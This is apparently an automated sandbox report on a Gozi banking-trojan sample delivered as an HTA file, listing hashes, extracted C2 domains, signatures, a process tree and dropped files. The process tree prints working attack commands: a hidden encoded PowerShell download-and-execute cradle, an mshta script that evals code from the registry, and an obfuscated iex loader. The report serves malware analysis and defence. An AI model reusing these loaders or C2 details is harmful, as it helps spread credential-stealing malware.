Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-10-2023 19:16

General

  • Target

    client_1.hta

  • Size

    22KB

  • MD5

    57d3eb665f1e9e6a19f278baabd49e7b

  • SHA1

    44566a9d716e6abd0304544dd88d245fea990882

  • SHA256

    4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d

  • SHA512

    30a0a3349aa0b815728abdb0c770d65354cdcf68ca939de4c175bdb285e3d664d7afdddc4be91bae170a65e4f808e6de7cc877fa36442f64f7b7db993e83851d

  • SSDEEP

    384:rO6BO5aa8mOFhyS1q5H8qxAt4VFhmqmfW9PW6vN1v35Zh5LaBY5E6bqBdOfF:4zS0kPWVN5LbtcOfF

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:3728
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2476
          • C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe
            "C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1940
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 472
              5⤵
              • Program crash
              PID:3780
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3672
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
          PID:3964
        • C:\Windows\Explorer.EXE
          C:\Windows\Explorer.EXE
          1⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of UnmapMainImage
          • Suspicious use of WriteProcessMemory
          PID:3168
          • C:\Windows\System32\mshta.exe
            "C:\Windows\System32\mshta.exe" "about:<hta:application><script>P8mb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(P8mb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"
            2⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fplrusmwxb -value gp; new-alias -name euvvogwtd -value iex; euvvogwtd ([System.Text.Encoding]::ASCII.GetString((fplrusmwxb "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))
              3⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:216
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1njsirxo\1njsirxo.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3624
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414A.tmp" "c:\Users\Admin\AppData\Local\Temp\1njsirxo\CSC77B2C79251742449895F9C3A3D431FE.TMP"
                  5⤵
                    PID:4780
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ehd1x5uc\ehd1x5uc.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4536
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES436D.tmp" "c:\Users\Admin\AppData\Local\Temp\ehd1x5uc\CSC81D9598F3AD74C1586A685A9136BD4D.TMP"
                    5⤵
                      PID:556
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:4564
                • C:\Windows\system32\PING.EXE
                  ping localhost -n 5
                  3⤵
                  • Runs ping.exe
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:3756
              • C:\Windows\syswow64\cmd.exe
                "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                2⤵
                  PID:3536
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1940 -ip 1940
                1⤵
                  PID:4280

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  16KB

                  MD5

                  cae71e792b971dc12eacf5551bcfebcd

                  SHA1

                  34068680ab14e197d699a232be9e040b966b44ba

                  SHA256

                  ec323a3ed1d64a0f21c9b6b4961381a29f2657e6577b381178ca6bd50aaf0f05

                  SHA512

                  c0bc7caf2e136c60ec1095e95bfb725e48c1d95251d40ab915c240601b1b1ff234762eb086e9425e7b245d9aeb0359db3de2f7a26f53d879bf744143540f1467

                • C:\Users\Admin\AppData\Local\Temp\1njsirxo\1njsirxo.dll

                  Filesize

                  3KB

                  MD5

                  0803055620784534a80d0adc3de2726e

                  SHA1

                  64e199f4335bae8585884b3cd0f62f02276fcb3b

                  SHA256

                  f2170b8d2ff41522b1a32334fd5167d19b03013209271178f1713fbb1e50ebfa

                  SHA512

                  17493a8d6a063e204dff8e593bf86be34dc92494f9923c7355abe17f052c6a2e4d33d890885e29a756c1bc0caed5cdd8639580bcde6e26bdca5dc1c2a407f1eb

                • C:\Users\Admin\AppData\Local\Temp\RES414A.tmp

                  Filesize

                  1KB

                  MD5

                  2fbc0e30c1afd281cf646a4ee870f66c

                  SHA1

                  7f3f91572d22e95767d504b8ee5f4d4acbf1a7e5

                  SHA256

                  7687d994790ee2c622dbfb107121ec461ca7caf3fc07fa2601fe0f8376530f09

                  SHA512

                  cac1be5e2f518d5948288c737b025a74aba0ad1cce5dbaa8823da164609d067df674c0e620a04fa89b568c8833057ad1ba2ac69ad6586d9dcd44294dedaad041

                • C:\Users\Admin\AppData\Local\Temp\RES436D.tmp

                  Filesize

                  1KB

                  MD5

                  1388f7a8fe16993c891f9f3b67acfd99

                  SHA1

                  6ddbcec85c3dd0431dcf3d390e3a28360e65169d

                  SHA256

                  b47a0d1c4a93cadcb9a2ae2941b4d5b0920ff6c7faaea34b0a178e9918ea9da7

                  SHA512

                  c7533219eaaa415b32aff5862a18ccba7dde9b321c4b148d4808b4ab66a7db3acb48ab3bc10807d4e6ad5d6a5333c5b344b257ba2a23e83c16ffb67e4b7b1701

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1e41ddhy.q1d.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\ehd1x5uc\ehd1x5uc.dll

                  Filesize

                  3KB

                  MD5

                  0f0aef4b6d92797b378112e865bd6649

                  SHA1

                  14452cb5e1e8350ae2c171c933233e26434ff095

                  SHA256

                  44e552733353c70ed08e27b267a084c874e4f40f085e980b9369ea6e8a2193fa

                  SHA512

                  0f2e22e43575ccbfec7518aea5478507334c7aa5ebd1bb05df930d0de3a3cccf4fb22fd6c161d4fd50be980c65afb83c0ed359748650a29808ca14b0da3ba558

                • C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe

                  Filesize

                  274KB

                  MD5

                  d18f3fecf6d28ddd0f4cf4a9b53c0aec

                  SHA1

                  05263b9ec69fcf48cc71443ba23545fabe21df12

                  SHA256

                  911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                  SHA512

                  4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                • C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe

                  Filesize

                  274KB

                  MD5

                  d18f3fecf6d28ddd0f4cf4a9b53c0aec

                  SHA1

                  05263b9ec69fcf48cc71443ba23545fabe21df12

                  SHA256

                  911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                  SHA512

                  4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                • C:\Users\Admin\AppData\Local\Temp\iXBKgLS.exe

                  Filesize

                  274KB

                  MD5

                  d18f3fecf6d28ddd0f4cf4a9b53c0aec

                  SHA1

                  05263b9ec69fcf48cc71443ba23545fabe21df12

                  SHA256

                  911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

                  SHA512

                  4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

                • \??\c:\Users\Admin\AppData\Local\Temp\1njsirxo\1njsirxo.0.cs

                  Filesize

                  405B

                  MD5

                  caed0b2e2cebaecd1db50994e0c15272

                  SHA1

                  5dfac9382598e0ad2e700de4f833de155c9c65fa

                  SHA256

                  21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                  SHA512

                  86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                • \??\c:\Users\Admin\AppData\Local\Temp\1njsirxo\1njsirxo.cmdline

                  Filesize

                  369B

                  MD5

                  86de380604ed902aa4e078c0f61a6e75

                  SHA1

                  63a2640354ab6878c3190487e2dc7c999972257d

                  SHA256

                  b69c3d1caa4e5f5997bb92e67230dedba4e2d2cd6bf3753bb72f1e37385c57ea

                  SHA512

                  0ecd9a00f5ce63619d65087eeb29810793708f52617e0c936901797f0b645320636440940a0238c6a6e59ce80d5555e0e5faaeff94fa3419ebdb258bd1b4e82d

                • \??\c:\Users\Admin\AppData\Local\Temp\1njsirxo\CSC77B2C79251742449895F9C3A3D431FE.TMP

                  Filesize

                  652B

                  MD5

                  5d039dd703cd6a33c24280845d0fa1d2

                  SHA1

                  4bbaea75e1939419a58cfb0ec6f017410ebfe687

                  SHA256

                  b0799afb7d519b37eebc009ecccdb045285fdb5d806faf31afc8f87583df5ae4

                  SHA512

                  08ee7d7e2026cbd656f3e3436de01f154633d0daed867351d883859792fec6d337d02439ab7a774dc37208b8f87119c2e6a68c99e6259d7b074b22e0ded1e63b

                • \??\c:\Users\Admin\AppData\Local\Temp\ehd1x5uc\CSC81D9598F3AD74C1586A685A9136BD4D.TMP

                  Filesize

                  652B

                  MD5

                  54a38be6e38cdf39fa5babc7e7965f22

                  SHA1

                  422784b74194fb7e3ddef5871138ea2105a090fa

                  SHA256

                  f63594d8943e82e95c4e063db3df03c7d8ee82d18f414ec15b0ce8639c46ca8e

                  SHA512

                  6120045262fc89aad7ce1968fa7504925dd2017f01130ad446563eeb2b2229af61d98de90d74918dc7868dde30bf6b11a3f2c0f07bbd7304e547c26880cb7ec8

                • \??\c:\Users\Admin\AppData\Local\Temp\ehd1x5uc\ehd1x5uc.0.cs

                  Filesize

                  406B

                  MD5

                  ca8887eacd573690830f71efaf282712

                  SHA1

                  0acd4f49fc8cf6372950792402ec3aeb68569ef8

                  SHA256

                  568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                  SHA512

                  2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                • \??\c:\Users\Admin\AppData\Local\Temp\ehd1x5uc\ehd1x5uc.cmdline

                  Filesize

                  369B

                  MD5

                  fc02bab24515f4fcd5bca3f7ec552c02

                  SHA1

                  c738fd6661585736f755e188fbd742ad6d72c29b

                  SHA256

                  45d47db46358d9afb046eb4ef499951970fa039434a9dfdd9bd3a6a9e2c72afe

                  SHA512

                  e565f02c2470d49c9ab7b56464f40c3335bc926c9df5a3a08b6d969ef72738152e96f92131e7bc58a11e9a96069f7f55f8d1fc1251f73e771c022ab104641a80

                • memory/216-96-0x00000278F9A10000-0x00000278F9A4D000-memory.dmp

                  Filesize

                  244KB

                • memory/216-63-0x00007FFFBEEA0000-0x00007FFFBF961000-memory.dmp

                  Filesize

                  10.8MB

                • memory/216-94-0x00000278F97D0000-0x00000278F97D8000-memory.dmp

                  Filesize

                  32KB

                • memory/216-66-0x00000278F96A0000-0x00000278F96B0000-memory.dmp

                  Filesize

                  64KB

                • memory/216-65-0x00000278F96A0000-0x00000278F96B0000-memory.dmp

                  Filesize

                  64KB

                • memory/216-80-0x00000278F9040000-0x00000278F9048000-memory.dmp

                  Filesize

                  32KB

                • memory/216-105-0x00007FFFBEEA0000-0x00007FFFBF961000-memory.dmp

                  Filesize

                  10.8MB

                • memory/216-108-0x00000278F9A10000-0x00000278F9A4D000-memory.dmp

                  Filesize

                  244KB

                • memory/216-58-0x00000278F9620000-0x00000278F9642000-memory.dmp

                  Filesize

                  136KB

                • memory/1940-148-0x0000000000400000-0x000000000228B000-memory.dmp

                  Filesize

                  30.5MB

                • memory/1940-41-0x0000000002390000-0x0000000002490000-memory.dmp

                  Filesize

                  1024KB

                • memory/1940-42-0x00000000022D0000-0x00000000022DB000-memory.dmp

                  Filesize

                  44KB

                • memory/1940-43-0x0000000000400000-0x000000000228B000-memory.dmp

                  Filesize

                  30.5MB

                • memory/1940-44-0x0000000000400000-0x000000000228B000-memory.dmp

                  Filesize

                  30.5MB

                • memory/1940-45-0x0000000002380000-0x000000000238D000-memory.dmp

                  Filesize

                  52KB

                • memory/1940-48-0x0000000002390000-0x0000000002490000-memory.dmp

                  Filesize

                  1024KB

                • memory/1940-49-0x0000000000400000-0x000000000228B000-memory.dmp

                  Filesize

                  30.5MB

                • memory/2476-27-0x0000000070960000-0x0000000071110000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2476-1-0x00000000053B0000-0x00000000053E6000-memory.dmp

                  Filesize

                  216KB

                • memory/2476-33-0x00000000054C0000-0x00000000054D0000-memory.dmp

                  Filesize

                  64KB

                • memory/2476-28-0x00000000054C0000-0x00000000054D0000-memory.dmp

                  Filesize

                  64KB

                • memory/2476-0-0x0000000070960000-0x0000000071110000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2476-26-0x0000000008F10000-0x00000000094B4000-memory.dmp

                  Filesize

                  5.6MB

                • memory/2476-25-0x0000000007EB0000-0x0000000007ED2000-memory.dmp

                  Filesize

                  136KB

                • memory/2476-24-0x0000000007F10000-0x0000000007FA6000-memory.dmp

                  Filesize

                  600KB

                • memory/2476-22-0x0000000006F00000-0x0000000006F1A000-memory.dmp

                  Filesize

                  104KB

                • memory/2476-21-0x00000000082E0000-0x000000000895A000-memory.dmp

                  Filesize

                  6.5MB

                • memory/2476-20-0x00000000054C0000-0x00000000054D0000-memory.dmp

                  Filesize

                  64KB

                • memory/2476-19-0x0000000006B10000-0x0000000006B5C000-memory.dmp

                  Filesize

                  304KB

                • memory/2476-18-0x0000000006A70000-0x0000000006A8E000-memory.dmp

                  Filesize

                  120KB

                • memory/2476-17-0x0000000006520000-0x0000000006874000-memory.dmp

                  Filesize

                  3.3MB

                • memory/2476-7-0x0000000006130000-0x0000000006196000-memory.dmp

                  Filesize

                  408KB

                • memory/2476-6-0x0000000005A20000-0x0000000005A86000-memory.dmp

                  Filesize

                  408KB

                • memory/2476-5-0x0000000005980000-0x00000000059A2000-memory.dmp

                  Filesize

                  136KB

                • memory/2476-4-0x0000000005B00000-0x0000000006128000-memory.dmp

                  Filesize

                  6.2MB

                • memory/2476-2-0x00000000054C0000-0x00000000054D0000-memory.dmp

                  Filesize

                  64KB

                • memory/2476-39-0x0000000070960000-0x0000000071110000-memory.dmp

                  Filesize

                  7.7MB

                • memory/2476-3-0x00000000054C0000-0x00000000054D0000-memory.dmp

                  Filesize

                  64KB

                • memory/3168-98-0x0000000008BA0000-0x0000000008C44000-memory.dmp

                  Filesize

                  656KB

                • memory/3168-99-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

                  Filesize

                  4KB

                • memory/3168-142-0x0000000008BA0000-0x0000000008C44000-memory.dmp

                  Filesize

                  656KB

                • memory/3536-144-0x0000000000280000-0x0000000000281000-memory.dmp

                  Filesize

                  4KB

                • memory/3536-146-0x0000000000360000-0x00000000003F8000-memory.dmp

                  Filesize

                  608KB

                • memory/3536-141-0x0000000000360000-0x00000000003F8000-memory.dmp

                  Filesize

                  608KB

                • memory/3672-152-0x0000021E336F0000-0x0000021E33794000-memory.dmp

                  Filesize

                  656KB

                • memory/3672-125-0x0000021E336F0000-0x0000021E33794000-memory.dmp

                  Filesize

                  656KB

                • memory/3672-128-0x0000021E32F90000-0x0000021E32F91000-memory.dmp

                  Filesize

                  4KB

                • memory/3728-111-0x000001E49F000000-0x000001E49F0A4000-memory.dmp

                  Filesize

                  656KB

                • memory/3728-112-0x000001E49EC80000-0x000001E49EC81000-memory.dmp

                  Filesize

                  4KB

                • memory/3728-147-0x000001E49F000000-0x000001E49F0A4000-memory.dmp

                  Filesize

                  656KB

                • memory/3756-137-0x000001BE45F90000-0x000001BE45F91000-memory.dmp

                  Filesize

                  4KB

                • memory/3756-136-0x000001BE46140000-0x000001BE461E4000-memory.dmp

                  Filesize

                  656KB

                • memory/3756-150-0x000001BE46140000-0x000001BE461E4000-memory.dmp

                  Filesize

                  656KB

                • memory/3964-117-0x0000020DF9EF0000-0x0000020DF9EF1000-memory.dmp

                  Filesize

                  4KB

                • memory/3964-149-0x0000020DFA8B0000-0x0000020DFA954000-memory.dmp

                  Filesize

                  656KB

                • memory/3964-116-0x0000020DFA8B0000-0x0000020DFA954000-memory.dmp

                  Filesize

                  656KB

                • memory/4564-122-0x000002260FD80000-0x000002260FE24000-memory.dmp

                  Filesize

                  656KB

                • memory/4564-124-0x000002260FC70000-0x000002260FC71000-memory.dmp

                  Filesize

                  4KB

                • memory/4564-151-0x000002260FD80000-0x000002260FE24000-memory.dmp

                  Filesize

                  656KB